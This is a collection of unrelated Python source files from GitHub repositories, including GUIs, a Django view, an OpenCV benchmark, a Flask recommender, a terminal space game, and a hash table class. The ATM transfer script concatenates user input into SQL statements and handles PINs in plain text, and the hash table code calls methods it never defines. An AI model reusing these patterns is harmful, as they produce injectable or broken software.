tkinter.Tk()\r\nroot.resizable(True, False)\r\nroot.minsize(370, 0)\r\nlogo = tkinter.PhotoImage(file=r\"T:\\ABM\\release\\ABM\\SANDAG_logo.gif\")\r\nw=tkinter.Label(root, image=logo, width=200)\r\nw.pack(side='top', fill='both', expand='yes')\r\nCreateScenarioGUI(root).pack(fill=constants.X, 
expand=1)\r\nroot.mainloop()","repo_name":"camsys/SANDAG-ABM","sub_path":"src/main/python/pythonGUI/createStudyAndScenario.py","file_name":"createStudyAndScenario.py","file_ext":"py","file_size_in_byte":20429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"26201905813","text":"from django.shortcuts import get_object_or_404\nfrom drf_yasg.utils import swagger_auto_schema\n\nfrom ..models import Study\nfrom ..serializers.schedule_of_study_sz import ScheduleOfStudySerializer\n\nfrom ...schedule.serializers.schedule_sz import ScheduleSerializer\n\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\n\n## ---스케줄---\nclass StudySchedule(APIView):\n @swagger_auto_schema(\n responses={200: ScheduleOfStudySerializer()},\n tags=['schedules'],\n operation_description=\n \"\"\"\n 스터디의 schedule 목록\n\n ---\n 정렬사항 \n - datetime의 역순으로 정렬\n\n 요청사항\n - study_id : 스터디의 id\n \"\"\",\n )\n def get(self, request, *args, **kwargs):\n print(\"StudySchedule\")\n study_schedule = self.get_object(self.kwargs['studies_id'])\n print(study_schedule)\n serializer = ScheduleOfStudySerializer(study_schedule)\n print(serializer)\n return Response(data=serializer.data)\n\n @swagger_auto_schema(\n request_body=ScheduleSerializer,\n responses={201: ScheduleSerializer()},\n tags=['schedules'],\n operation_description=\n \"\"\"\n 스케줄 생성 API\n\n ---\n 요청사양\n - study : 스터디 id\n - datetime : 일정 날짜 YY-MM-DDTHH:MM\n - place : 장소\n - description : 일정 소개 \n \"\"\",\n )\n def post(self, request, *args, **kwargs):\n serializer = ScheduleSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(data=serializer.data)\n return Response(data=serializer.error)\n\n def get_object(self, pk):\n return get_object_or_404(Study, pk=pk)\n","repo_name":"wisestudy/wisestudy-server","sub_path":"api/study/views/study_schedule.py","file_name":"study_schedule.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73864340307","text":"import numpy as np\nimport time\nimport csv\nimport cv2\n\n\n## Define the model parameters\n\npb = \"/home/victor/Projects/Thesis/Models/ssd_mobilenet_v1_coco.pb\"\npbtxt = \"/home/victor/Projects/Thesis/Models/ssd_mobilenet_v1_coco.pbtxt\"\nconf = 0.4\n\n\n## Set source file parameters and prepare the VideoCapture\n\n# filename = \"TestSeq1.mp4\"\n\n# folder = \"../Footage\"\nfolder = \"/home/victor/Projects/Footage/Clips1/00:00:30.442.mp4\"\n\ncap = cv2.VideoCapture()\nvid = cap.open(folder)\nframeCount = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n\n\n## Load the serialized model from disk\n\nprint(\"[INFO] loading model...\")\nnet = cv2.dnn.readNetFromTensorflow(pb, pbtxt)\n\n\n## Start the timekeeping to calculate model speed\n\nstart = time.time()\n\n\n## Main loop over the video file\n\nwhile True:\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n # Prevent crash at the end of the video file\n if not ret:\n break\n\n # Get the frame dimensions for later on\n (h, w) = frame.shape[:2]\n\n # Create a blob from the source frame by resizing to the required 300x300 size\n blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)), 0.007843, (300, 300), 127.5)\n\n # Feed blob to the net and perform a forward pass\n net.setInput(blob)\n detections = net.forward()\n\n print(detections)\n\n # loop over the detections\n # for i in np.arange(0, detections.shape[2]):\n # # extract the confidence (i.e., 
probability) associated with the prediction\n # confidence = detections[0, 0, i, 2]\n #\n # # filter out weak detections by ensuring the `confidence` is greater than the minimum confidence\n # if confidence > conf:\n #\n # # Compute the (x, y)-coordinates of the bounding box for the object\n # box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n # (startX, startY, endX, endY) = box.astype(\"int\")\n #\n # # display the prediction\n # label = \"{:.2f}%\".format(confidence * 100)\n # cv2.rectangle(frame, (startX, startY), (endX, endY), (0, 255, 0), 2)\n # y = startY - 15 if startY - 15 > 15 else startY + 15\n # cv2.putText(frame, label, (startX, y), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n\n # Display the resulting frame\n cv2.line(frame, (0, 360), (1280, 360), (0, 0, 0), 2)\n cv2.imshow('frame', frame)\n\n # Wait for q key to be pressed to stop the program\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Calculate end time and print the speed benchmark results\nend = time.time()\nprint(\"[INFO] it took %s seconds.\" % (end - start))\nprint(\"[INFO] clip has %s frames\" % frameCount)\nprint(\"[INFO] that makes %s fps\" % (frameCount / (end - start)))\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()","repo_name":"thepycoder/Thesis","sub_path":"Testing/MobileNetTensorflow.py","file_name":"MobileNetTensorflow.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1872822202","text":"from model.series import Series\n\n\nclass TestSeriesBuilder:\n\n def __init__(self, data, interval=1, unit='s'):\n self.unit = unit\n self.interval = interval\n self.data = data\n\n def assert_same_units(self, other):\n if self.unit != other.unit or self.interval != other.interval:\n raise ValueError('Unit/interval mismatch')\n\n def append(self, test_series, piecewise=False):\n self.assert_same_units(test_series)\n last_index = self.data[-1][0] + 1\n first_new_index = test_series.data[0][0]\n if piecewise:\n piecewise_diff = self.data[-1][1] - test_series.data[0][1]\n else:\n piecewise_diff = 0\n for e in test_series.data:\n new_index = last_index + e[0] - first_new_index\n entry = e[1] + piecewise_diff\n self.data.append([new_index, entry])\n\n def compose(self, test_series):\n self.assert_same_units(test_series)\n for i in range(len(self.data)):\n index = self.data[i][0]\n self.data[i] = [index, self.data[i][1] + test_series.data[i][1]]\n\n def build(self):\n return Series.from_array(self.data, self.unit)\n\n @staticmethod\n def constant(length, value=0, interval=1, unit='s'):\n return TestSeriesBuilder.linear(length, value, 0, interval, unit)\n\n @staticmethod\n def linear(length, startvalue, slope, interval=1, unit='s', start_time=0):\n data = []\n for i in range(length):\n data.append([(i*interval)+start_time, startvalue + slope*i*interval])\n return TestSeriesBuilder(data, interval, unit)\n","repo_name":"GNico/ts-analysis","sub_path":"backend/ts_project/salib/model/test/test_series_builder.py","file_name":"test_series_builder.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8313744752","text":"from tkinter import*\nfrom tkinter import messagebox\nimport sqlite3\nfrom PIL import ImageTk, Image\n\nwin=Tk()\nwin.geometry(\"550x500\")\nwin.resizable(False,False)\nwin.title(\"Welcome to the 
transfer\")\nload=Image.open('tra.jpg')\nrender=ImageTk.PhotoImage(load)\nimg=Label(win,image=render)\nimg.place(x=0,y=0)\n\ndef transfer():\n #a=str(num1.get())\n #b=str(num2.get())\n #c=str(num3.get())\n #d=str(num4.get())\n #e=str(num5.get())\n atmtype=\"Transfer\"\n conn = sqlite3.connect(database=r'bank.db')\n mydb=conn.cursor()\n try:\n mydb.execute(\"insert into type(card_number,amount,type) values ('\"+num1.get()+\"','\"+num3.get()+\"','\"+atmtype+\"')\")\n mydb.execute(\"update deposit set amount = amount - '\"+num3.get()+\"' where pin='\"+num2.get()+\"'\")\n mydb.execute(\"insert into bank(card_number_to,pin,amount) values ('\"+num4.get()+\"','\"+num2.get()+\"','\"+num3.get()+\"')\")\n conn.commit()\n messagebox.showinfo(\"Message\",\"Transfed\")\n except:\n messagebox.showerror(\"Error\",\"Check your Details\")\n conn.close()\n\nlb=Label(win,text=\"Enter Card Number From\",font=20,width=25).grid(row=0,column=0,padx=20,pady=20)\n\nlb2=Label(win,text=\"Enter Pin\",font=20,width=10).grid(row=1,column=0,padx=20,pady=20)\n\nlb3=Label(win,text=\"Enter Amount\",font=20,width=15).grid(row=2,column=0,padx=20,pady=20)\n\nlb4=Label(win,text=\"Enter Card Number To\",font=20,width=20).grid(row=3,column=0,padx=20,pady=20)\n\nlb5=Label(win,text=\"Enter IFSC\",font=20,width=10).grid(row=4,column=0,padx=20,pady=20)\n\nnum1=StringVar()\ntx=Entry(win,font=10,width=20,textvariable=num1).grid(row=0,column=1)\nnum2=StringVar()\ntx2=Entry(win,font=10,width=20,textvariable=num2).grid(row=1,column=1)\nnum3=StringVar()\ntx3=Entry(win,font=10,width=20,textvariable=num3).grid(row=2,column=1)\nnum4=StringVar()\ntx4=Entry(win,font=10,width=20,textvariable=num4).grid(row=3,column=1)\nnum5=StringVar()\ntx5=Entry(win,font=10,width=20,textvariable=num5).grid(row=4,column=1)\n\nbtn=Button(win,text=\"Transfer\",command=transfer,relief=\"raised\",bd=10,font=20,highlightbackground=\"blue\",highlightthickness=10).place(x=220,y=370)\n\nwin.mainloop()\n","repo_name":"madhavsharma7/Atm-on-sqlite3","sub_path":"transfer3.py","file_name":"transfer3.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21262885514","text":"'''\nReferences:\nhttps://getbootstrap.com/docs/5.1/examples/\nhttps://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.read_pickle.html \nhttps://towardsdatascience.com/how-to-easily-deploy-machine-learning-models-using-flask-b95af8fe34d4\n'''\n\nfrom flask import Flask, render_template, request, redirect\nimport pandas as pd\nimport nltk\nfrom nltk.corpus import sentiwordnet as swn\nfrom bs4 import BeautifulSoup\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\n\n\n\napp = Flask(__name__)\n\n\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef home():\n return render_template(\"index.html\")\n\n@app.route(\"/methodology/\")\ndef methodology():\n return render_template(\"methodology.html\") \n\n \n@app.route(\"/matches/\", methods = ['GET', 'POST'])\ndef matches():\n req_type = request.method\n form_data = request.form\n resID = request.form['ResumeID']\n print(resID)\n # resID = 17812897\n topN = request.form['TopN']\n print(topN)\n # topN = 10\n df_matches = get_matches(resID, topN)\n # return df_matches\n return render_template(\"matches.html\", tables=[df_matches.to_html(classes='data')], titles=df_matches.columns.values)\n\n\n\n \n'''\ndef get_outlook():\n data_outlook = pd.read_pickle('cleaned_outlook_corpus.pkl')\n df_o 
= pd.DataFrame(data_outlook)\n df_o_head = df_o.head()\n df_o_head = df_o_head[['O*NET-SOC Code', 'Title', 'outlook_pred']]\n return df_o_head\n'''\n\ndef get_recommendation(top, occupation_match, scores):\n recommendation = pd.DataFrame(columns = ['JobID', 'title', 'score', 'sentiment'])\n count = 0\n print(top)\n print(occupation_match)\n for i in top:\n # recommendation.at[count, 'ID'] = resID\n recommendation.at[count, 'JobID'] = occupation_match['O*NET-SOC Code'][i]\n recommendation.at[count, 'title'] = occupation_match['title'][i]\n recommendation.at[count, 'score'] = scores[count]\n recommendation.at[count, 'sentiment'] = occupation_match['outlook_pred'][i]\n count += 1\n return recommendation\n\n\n\ndef cos_similarity(df_res, df_occu, topX):\n # Feature extraction\n tfidf_vectorizer = TfidfVectorizer()\n tfidf_occupations = tfidf_vectorizer.fit_transform((df_occu['cleaned_text'])) \n tfidf_resumes = tfidf_vectorizer.transform(df_res['Resume_str_cleaned']) \n \n #Cosine similarity\n cos_similarity_tfidf = map(lambda x: cosine_similarity(tfidf_resumes, x),tfidf_occupations)\n \n # Convert the cosine similarities into a list\n r = list(cos_similarity_tfidf)\n\n # Top 10 occupational recommendations\n top = sorted(range(len(r)), key=lambda i: r[i], reverse=True)[:int(topX)]\n list_scores = [r[i][0][0] for i in top]\n data = pd.read_pickle('cleaned_outlook_corpus.pkl')\n occupations_new = pd.DataFrame(data)\n df_rec = get_recommendation(top, occupations_new, list_scores)\n return df_rec\n\n\ndef get_matches(resumeID, topNoccs):\n data_resume = pd.read_pickle('cleaned_resume_corpus.pkl')\n df_r = pd.DataFrame(data_resume)\n print(type(resumeID))\n print(df_r.dtypes)\n print(df_r.head())\n df_resume = df_r[df_r['ID']==int(resumeID)]\n print(df_resume)\n data_occs = pd.read_pickle('cleaned_outlook_corpus.pkl')\n df_occs = pd.DataFrame(data_occs)\n print(df_occs)\n job_matches = cos_similarity(df_resume, df_occs, topNoccs)\n return job_matches\n\n\n'''\ndata = pd.read_pickle('cleaned_outlook_corpus.pkl')\ndata_frame = pd.DataFrame(data)\nprint(data_frame.head())\n'''\n\n","repo_name":"llwasson/llwasson_nlp_final2","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29135966821","text":"from typing import List, NamedTuple, Tuple\nimport time\nimport random\nfrom random import randint\nimport curses\nfrom itertools import cycle\nimport asyncio\n\nfrom curses_tools import draw_frame\nfrom curses_tools import read_controls\n\nfrom space_garbage import TRASH_FRAMES\nfrom space_garbage import fly_garbage\nfrom physics import update_speed\nfrom fire_animation import fire\n\n\nSTAR_SYMBOLS = ('+', '*', '.', ':')\nANIMATION_DELAY = 0.1\nMAX_STAR_DELAY = 50\nSPACE_FRAME_FILES = ('spaceFrames/frame_0.txt', 'spaceFrames/frame_1.txt')\nBORDER_SIZE = 1\n\nGAME_OVER_FRAME = 'otherFrames/game_over.txt'\nONE_YEAR_DURATION_IN_SECONDS = 1.5\n\nPHRASES = {\n 1957: \"First Sputnik\",\n 1961: \"Gagarin flew!\",\n 1969: \"Armstrong got on the moon!\",\n 1971: \"First orbital space station Salute-1\",\n 1981: \"Flight of the Shuttle Columbia\",\n 1998: 'ISS start building',\n 2011: 'Messenger launch to Mercury',\n 2020: \"Take the plasma gun! 
Shoot the garbage!\",\n}\n\n\ndef load_space_frames(frame_files=SPACE_FRAME_FILES) -> List[str]:\n result = []\n for path in frame_files:\n with open(path) as f:\n result += [''.join(f.readlines())] * 2\n return result\n\n\nclass Extent(NamedTuple):\n dx: int\n dy: int\n\n\ndef load_game_over_frame(frame_file=GAME_OVER_FRAME):\n lines = []\n with open(frame_file, 'r') as f:\n for line in f:\n line = line.rstrip()\n lines.append(line)\n return lines\n\n\ndef get_space_frame_size(frame_files=SPACE_FRAME_FILES) -> Extent:\n max_x, max_y = 0, 0\n for path in frame_files:\n with open(path) as f:\n lines = f.readlines()\n max_line_size = max((len(x.rstrip()) for x in lines))\n max_y = max(max_y, len(lines))\n max_x = max(max_x, max_line_size)\n return Extent(max_x, max_y)\n\n\nasync def sleep(ticks=1):\n for i in range(ticks):\n await asyncio.sleep(0)\n\n\nasync def star_blink(canvas, y_pos: int, x_pos: int, start_delay: int,\n symbol='*'):\n await sleep(start_delay)\n while True:\n canvas.addstr(y_pos, x_pos, symbol, curses.A_DIM)\n await sleep(20)\n canvas.addstr(y_pos, x_pos, symbol)\n await sleep(3)\n canvas.addstr(y_pos, x_pos, symbol, curses.A_BOLD)\n await sleep(5)\n canvas.addstr(y_pos, x_pos, symbol)\n await sleep(3)\n\n\nclass MyGame:\n def __init__(self):\n self.canvas = None\n\n self.space_frames = load_space_frames()\n self.space_frame_size = get_space_frame_size()\n self.game_over_frame = load_game_over_frame()\n self.space_x_speed = 0\n self.space_y_speed = 0\n self.space_coords = (0, 0)\n self.is_shot = False\n self.coroutines = []\n self.obstacles = dict()\n self.destroyed_obstacle_ids = set()\n self.is_space_died = False\n self.current_year = 1957\n\n self.__additional_canvas = None\n\n @property\n def window_size(self) -> Extent:\n height, width = self.canvas.getmaxyx()\n return Extent(width, height)\n\n @property\n def canvas_center_coords(self) -> Tuple[int, int]:\n height, width = self.canvas.getmaxyx()\n x_max = width - 1\n y_max = height - 1\n return x_max // 2, y_max // 2\n\n @property\n def garbage_delay_tics(self) -> int:\n if self.current_year < 1961:\n return -1\n elif self.current_year < 1969:\n return 20\n elif self.current_year < 1981:\n return 14\n elif self.current_year < 1995:\n return 10\n elif self.current_year < 2010:\n return 8\n elif self.current_year < 2020:\n return 6\n else:\n return 2\n\n def generate_stars(self) -> dict:\n window_extent = self.window_size\n x_max, y_max = window_extent.dx - 1, window_extent.dy - 1\n min_stars_count = x_max * y_max // 20\n max_stars_count = x_max * y_max // 10\n\n stars = dict()\n for _ in range(randint(min_stars_count, max_stars_count)):\n x = random.randint(BORDER_SIZE, x_max - BORDER_SIZE)\n y = random.randint(BORDER_SIZE, y_max - BORDER_SIZE)\n if (x, y) not in stars:\n delay = random.randint(0, MAX_STAR_DELAY)\n stars[(x, y)] = [random.choice(STAR_SYMBOLS), delay]\n return stars\n\n def get_space_corrected_coords(self, x: int, y: int) -> tuple:\n x_min, y_min = BORDER_SIZE, BORDER_SIZE\n x_max = self.window_size.dx - 1 - BORDER_SIZE - self.space_frame_size.dx\n y_max = self.window_size.dy - 1 - BORDER_SIZE - self.space_frame_size.dy\n\n x = x_min if x < x_min else x\n x = x_max if x > x_max else x\n\n y = y_min if y < y_min else y\n y = y_max if y > y_max else y\n return x, y\n\n async def space_animation(self):\n for frame in cycle(self.space_frames):\n x, y = self.space_coords\n for obstacle in self.obstacles.values():\n if obstacle.has_collision(y, x, self.space_frame_size.dy,\n self.space_frame_size.dx):\n 
self.is_space_died = True\n return\n\n draw_frame(self.canvas, y, x, frame)\n await sleep(1)\n draw_frame(self.canvas, y, x, frame, negative=True)\n\n async def add_fire(self):\n while True:\n if self.is_shot and self.current_year > 2019:\n coroutine = fire(self.canvas, self.space_coords[1],\n self.space_coords[0] + 2,\n self.obstacles, self.destroyed_obstacle_ids)\n self.coroutines.append(coroutine)\n await sleep(1)\n\n async def fill_orbit_with_garbage(self):\n id_val = 0\n while True:\n if self.garbage_delay_tics < 0:\n await sleep(1)\n continue\n else:\n await sleep(self.garbage_delay_tics)\n\n max_x = self.window_size.dx - BORDER_SIZE\n start_x = randint(1, max_x - 1)\n frame = random.choice(TRASH_FRAMES)\n\n coroutine = fly_garbage(self.canvas, start_x, frame, id_val,\n self.obstacles,\n self.destroyed_obstacle_ids)\n self.coroutines.append(coroutine)\n id_val += 1\n\n def get_game_over_text_position(self):\n canvas_x_mid, canvas_y_mid = self.canvas_center_coords\n label_width_mid = len(self.game_over_frame[1]) / 2\n label_height_mid = len(self.game_over_frame) / 2\n\n x_mid = int(canvas_x_mid - label_width_mid)\n y_mid = int(canvas_y_mid - label_height_mid)\n return x_mid, y_mid\n\n async def show_game_over(self):\n x_pos, y_pos = self.get_game_over_text_position()\n frame_text = '\\n'.join(self.game_over_frame)\n while True:\n if self.is_space_died:\n draw_frame(self.canvas, y_pos, x_pos, frame_text)\n await asyncio.sleep(0)\n\n async def show_year_label(self):\n new_window = self.canvas.derwin(1, self.window_size.dx - 2, 1, 1)\n while not self.is_space_died:\n history_fact = PHRASES.get(self.current_year, '')\n text = f'Year: {self.current_year} {history_fact}'\n if history_fact:\n for _ in range(10):\n draw_frame(new_window, 0, 0, text)\n await sleep(1)\n else:\n draw_frame(new_window, 0, 0, text)\n await sleep(1)\n draw_frame(new_window, 0, 0, text, negative=True)\n\n def run(self, canvas):\n canvas.nodelay(True)\n curses.curs_set(False)\n\n self.canvas = canvas\n\n stars = self.generate_stars()\n for star_coords, attributes in stars.items():\n x, y = star_coords\n symbol, delay = attributes\n self.coroutines.append(star_blink(canvas, y, x, delay, symbol))\n\n self.space_coords = self.canvas_center_coords\n self.coroutines.append(self.space_animation())\n\n self.coroutines.append(self.fill_orbit_with_garbage())\n self.coroutines.append(self.add_fire())\n self.coroutines.append(self.show_game_over())\n self.coroutines.append(self.show_year_label())\n\n snap_index = 0\n while True:\n if not self.is_space_died:\n y_direction, x_direction, is_shot = read_controls(canvas)\n self.is_shot = is_shot and self.current_year > 2019\n\n x, y = self.space_coords\n v_x, v_y = self.space_x_speed, self.space_y_speed\n\n v_y, v_x = update_speed(v_y, v_x, y_direction, x_direction)\n x += v_x\n y += v_y\n\n self.space_x_speed, self.space_y_speed = v_x, v_y\n self.space_coords = self.get_space_corrected_coords(x, y)\n\n for coroutine in self.coroutines.copy():\n try:\n coroutine.send(None)\n except StopIteration:\n self.coroutines.remove(coroutine)\n if len(self.coroutines) == 0:\n break\n\n canvas.refresh()\n canvas.border()\n time.sleep(ANIMATION_DELAY)\n\n if not snap_index % (\n ONE_YEAR_DURATION_IN_SECONDS / ANIMATION_DELAY):\n self.current_year += 1\n snap_index += 1\n","repo_name":"MikkoArtik/AsyncSpaceGame","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":9463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
+{"seq_id":"43147098067","text":"class HashTable:\n def __init__(self):\n self.size = 128\n self.keys = [None] * self.size\n self.values = [None] * self.size\n\n def __growTable(self):\n self.size *= 2\n \n # Check if new size is a prime number\n is_prime = True\n for i in range(2, int(self.size ** 0.5) + 1):\n if self.size % i == 0:\n is_prime = False\n break\n if not is_prime:\n print(\"Warning: table size is not a prime number, increasing collision probability.\")\n \n new_keys = [None] * self.size\n new_values = [None] * self.size\n for i in range(len(self.keys)):\n if self.keys[i] is not None:\n index = self.__hash(self.keys[i])\n new_keys[index] = self.keys[i]\n new_values[index] = self.values[i]\n self.keys = new_keys\n self.values = new_values\n \n def insert(self, key, value):\n index = self.__hash(key)\n if self.keys[index] is None:\n self.keys[index] = key\n self.values[index] = value\n else:\n if self.keys[index] == key:\n self.values[index] = value # update value for existing key\n else:\n # collision, find next available slot\n next_index = self.__findNextSlot(index)\n while self.keys[next_index] is not None and self.keys[next_index] != key:\n next_index = self.__findNextSlot(next_index)\n if next_index == index:\n # Sequence of probing is exhausted, table is full\n try:\n # Try to cause the exception by generating a random key sequence\n import random\n random.seed(0)\n for i in range(self.size):\n random_key = str(random.random())\n self.insert(random_key, random_key)\n except Exception as e:\n # Log the problem\n import logging\n logging.basicConfig(filename='hash_table.log', level=logging.ERROR)\n logging.error(\"Exception: \" + str(e) + \", table size: \" + str(self.size))\n print(\"Error: table is full and sequence of probing is exhausted.\")\n return\n self.keys[next_index] = key\n self.values[next_index] = value\n\n def __hash(self, key):\n # hash function, returns an index between 0 and self.size-1\n return sum([ord(c) for c in key]) % self.size\n\n def __findNextSlot(self, index):\n # linear probing sequence\n return (index + 1) % self.size\n \n def showProbingSequence(self):\n for i in range(3):\n for j in range(3):\n for k in range(200):\n key = f'{i},{j},{k}'\n index = self.__hash(key)\n count = 0\n while self.keys[index] is not None and self.keys[index] != key:\n index = self.__findNextSlot(index)\n count += 1\n if count == self.size:\n print(f'Unable to insert key: {key} for condition {i},{j}')\n break\n if self.keys[index] is None:\n self.insert(key, key)\n print(f'Key {key} inserted with {count} probes for condition {i},{j}')\n else:\n print(f'Key {key} already exists with {count} probes for condition {i},{j}')\n \n # Create a HashTable instance\nht = HashTable()\n\n# Add some key-value pairs\nht.insert('key1', 'value1')\nht.insert('key2', 'value2')\nht.insert('key3', 'value3')\nht.insert('key4', 'value4')\n\n# Retrieve the values associated with the keys\nprint(ht['key1']) # Output: value1\nprint(ht.get('key2')) # Output: value2\nprint(ht.get('key5', 'default_value')) # Output: default_value\n\n# Show the probing sequence\nht.showProbingSequence()\n\n\n \n \n","repo_name":"cielobuezo/Algoritmos-","sub_path":"Cap_11/11.3/Hash.py","file_name":"Hash.py","file_ext":"py","file_size_in_byte":4237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31576961527","text":"import os\nfrom collections.abc import Iterator\nfrom pathlib import Path\nfrom typing import Callable, Union\n\nfrom typing_extensions 
import Self\n\nfrom htc.settings import settings\nfrom htc.tivita.DataPath import DataPath\nfrom htc.tivita.DatasetSettings import DatasetSettings\n\n\nclass DataPathTivita(DataPath):\n def __init__(self, *args, **kwargs) -> None:\n \"\"\"\n Constructs a generic data path for any kind of Tivita hyperspectral image folder.\n \"\"\"\n super().__init__(*args, **kwargs)\n self.attributes = list(self.image_dir.relative_to(self.data_dir).parts[:-1])\n\n def build_path(self, base_folder: Path) -> Path:\n return base_folder / \"/\".join(self.attributes + [self.timestamp])\n\n @staticmethod\n def from_image_name(image_name: str) -> Self:\n raise NotImplementedError()\n\n @staticmethod\n def iterate(\n data_dir: Path,\n filters: list[Callable[[Self], bool]],\n annotation_name: Union[str, list[str]],\n ) -> Iterator[\"DataPathTivita\"]:\n # Settings of the dataset (shapes etc.) can be referenced by the DataPaths\n path_settings = None\n possible_paths = [data_dir] + list(data_dir.parents)\n for p in possible_paths:\n if (p / \"dataset_settings.json\").exists():\n path_settings = p / \"dataset_settings.json\"\n break\n\n dataset_settings = DatasetSettings(path_settings)\n intermediates_dir = settings.datasets.find_intermediates_dir(data_dir)\n\n # Keep a list of used image folders in case a folder contains both a cube file and a tiv archive\n used_folders = set()\n for root, dirs, files in os.walk(data_dir):\n dirs.sort() # Recurse in sorted order\n for f in sorted(files):\n if f.endswith((\"SpecCube.dat\", \".tiv\")) and root not in used_folders:\n path = DataPathTivita(Path(root), data_dir, intermediates_dir, dataset_settings, annotation_name)\n if all(f(path) for f in filters):\n yield path\n used_folders.add(root)\n","repo_name":"IMSY-DKFZ/htc","sub_path":"htc/tivita/DataPathTivita.py","file_name":"DataPathTivita.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"48"} +{"seq_id":"5676600643","text":"import sys\nimport numpy\nimport numpy as np\nimport colorsys\nfrom socket import gethostname\nimport time\nimport argparse\nimport os\nimport colorsys\nimport copy\nimport pandas as pd\nimport pickle\nimport random\nimport auxFunc\nimport scipy\nimport scipy.io as sio\nimport scipy.stats\n\n\n# sys.path.append(os.path.abspath(\"../diffEqModel/\"))\n\n\nparser = argparse.ArgumentParser(description='Launches voxel-wise/point-wise DPM on ADNI'\n 'using cortical thickness maps derived from MRI')\n\nparser.add_argument('--agg', dest='agg', type=int, default=0,\n help='agg=1 => plot figures without using Xwindows, for use on cluster where the plots cannot be displayed '\n ' agg=0 => plot with Xwindows (for use on personal machine)')\n\nparser.add_argument('--runIndex', dest='runIndex', type=int,\n default=1, help='index of run instance/process .. 
for cross-validation')\n\nparser.add_argument('--nrProc', dest='nrProc', type=int,\n default=1, help='# of processes')\n\nparser.add_argument('--modelToRun', dest='modelToRun', type=int,\n help='index of model to run')\n\nparser.add_argument('--cluster', action=\"store_true\",\n help='need to include this flag if runnin on cluster')\n\nparser.add_argument('--nrRows', dest='nrRows', type=int,\n help='nr of subfigure rows to plot at every iteration')\n\nparser.add_argument('--nrCols', dest='nrCols', type=int,\n help='nr of subfigure columns to plot at every iteration')\n\nparser.add_argument('--penalty', dest='penalty', type=float,\n help='penalty value for non-monotonic trajectories. between 0 (no effect) and 10 (strong effect). ')\n\nparser.add_argument('--regData', action=\"store_true\", default=False,\n help=' add this flag to regenerate the data')\n\nparser.add_argument('--runPartStd', dest='runPartStd', default='RR',\n help=' choose whether to (R) run or (L) load from the checkpoints: '\n 'either LL, RR, LR or RL. ')\n\nparser.add_argument('--tinyData', action=\"store_true\", default=False,\n help=' only run on a tiny subset of the data: around 200/1980 subjects')\n\n\nargs = parser.parse_args()\n\nif args.agg:\n # print(matplotlib.__version__)\n import matplotlib\n matplotlib.use('Agg')\n # print(asds)\n\nimport genSynthData\nimport ParHierModel\nimport Plotter\nfrom auxFunc import *\nimport evaluationFramework\nfrom matplotlib import pyplot as pl\nfrom env import *\n\nfrom drcValidFuncs import *\nfrom tadpoleDataLoader import *\nfrom drcDataLoader import *\nfrom tadpoleDrcPrepData import *\n\n\n\n# DKT OTHER_MODEL VALID TRAINING\n# circle triangle diagonal cross square\n#\n# ADNI CTL green\n# MCI orange\n# AD red\n# DRC CTL yellow\n# PCA magenta\n# AD blue\n\nplotTrajParams = {}\nplotTrajParams['SubfigTrajWinSize'] = (1600,900)\nplotTrajParams['nrRows'] = args.nrRows\nplotTrajParams['nrCols'] = args.nrCols\nplotTrajParams['diagColors'] = {CTL:'g', MCI:'#FFA500', AD:'r',\n CTL2:'y', PCA:'m', AD2:'b', CTL_OTHER_MODEL:'k', PCA_OTHER_MODEL:'b',\n CTL_DKT:'g', PCA_DKT:'r'}\nplotTrajParams['diagScatterMarkers'] = {CTL:'s', MCI:'s', AD:'s',\n CTL2:'s', PCA:'s', AD2:'s', CTL_OTHER_MODEL:'^', PCA_OTHER_MODEL:'^',\n CTL_DKT: 'o', PCA_DKT: 'o'}\nplotTrajParams['legendCols'] = 4\nplotTrajParams['diagLabels'] = {CTL:'CTL ADNI', MCI:'MCI ADNI', AD:'tAD ADNI',\n CTL2:'CTL LOCAL', PCA:'PCA LOCAL', AD2:'tAD LOCAL', CTL_OTHER_MODEL:'CTL LOCAL - No DKT',\n PCA_OTHER_MODEL:'PCA LOCAL - No DKT', CTL_DKT:'CTL - DTK', PCA_DKT:'PCA - DTK'}\n\n# plotTrajParams['freesurfPath'] = freesurfPath\n# plotTrajParams['blenderPath'] = blenderPath\nplotTrajParams['isSynth'] = False\nplotTrajParams['padTightLayout'] = 0.4\n\nif args.agg:\n plotTrajParams['agg'] = True\nelse:\n plotTrajParams['agg'] = False\n\nhostName = gethostname()\nif hostName == 'razvan-Inspiron-5547':\n height = 350\nelse: #if hostName == 'razvan-Precision-T1700':\n height = 450\n\n\npd.set_option('display.max_rows', 100)\npd.set_option('display.max_columns', 50)\npd.set_option('display.width', 5000)\n\n\ndef visDataHist(dataDfAll):\n\n unqDiags = np.unique(dataDfAll.diag)\n biomks = 